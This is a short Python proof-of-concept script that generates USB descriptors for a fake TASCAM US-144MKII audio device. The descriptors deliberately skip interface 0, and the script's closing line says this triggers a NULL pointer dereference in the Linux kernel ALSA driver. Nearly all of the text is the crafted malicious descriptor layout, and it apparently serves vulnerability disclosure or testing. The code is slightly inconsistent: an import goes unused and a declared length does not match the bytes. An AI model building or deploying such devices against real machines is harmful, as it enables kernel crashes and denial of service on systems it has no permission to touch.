# This PoC simulates the malicious USB device structure.
# It describes a USB configuration with Interface 1 but missing Interface 0.
import usb.core
import usb.util
def create_malicious_device_descriptor():
"""
Generates a descriptor set for a device claiming to be TASCAM US-144MKII
but with bInterfaceNumber=1 and no Interface 0.
"""
# Standard Device Descriptor (simplified)
device_desc = [
0x12, # bLength
0x01, # bDescriptorType (Device)
0x00, 0x02, # bcdUSB (2.0)
0x00, # bDeviceClass
0x00, # bDeviceSubClass
0x00, # bDeviceProtocol
0x40, # bMaxPacketSize0
0x44, 0x06, # idVendor (TASCAM)
0x49, 0x80, # idProduct (US-144MKII)
0x00, 0x01, # bcdDevice
0x01, # iManufacturer
0x02, # iProduct
0x00, # iSerialNumber
0x01 # bNumConfigurations
]
# Configuration Descriptor
config_desc = [
0x09, # bLength
0x02, # bDescriptorType (Configuration)
0x20, 0x00, # wTotalLength
0x01, # bNumInterfaces (Claiming 1 interface)
0x01, # bConfigurationValue
0x00, # iConfiguration
0x80, # bmAttributes (Bus Powered)
0x32 # MaxPower (100mA)
]
# Interface Descriptor (Skipping Interface 0, using Interface 1)
# This violates the driver's assumption that interface 0 exists.
interface_desc = [
0x09, # bLength
0x04, # bDescriptorType (Interface)
0x01, # bInterfaceNumber (1 - Missing 0)
0x00, # bAlternateSetting
0x00, # bNumEndpoints
0x01, # bInterfaceClass (Audio)
0x01, # bInterfaceSubClass
0x00, # bInterfaceProtocol
0x00 # iInterface
]
return device_desc + config_desc + interface_desc
print("Malicious USB Descriptor Structure Generated.")
print("Connect a device programmed with these descriptors to trigger the NULL pointer dereference in Linux Kernel ALSA.")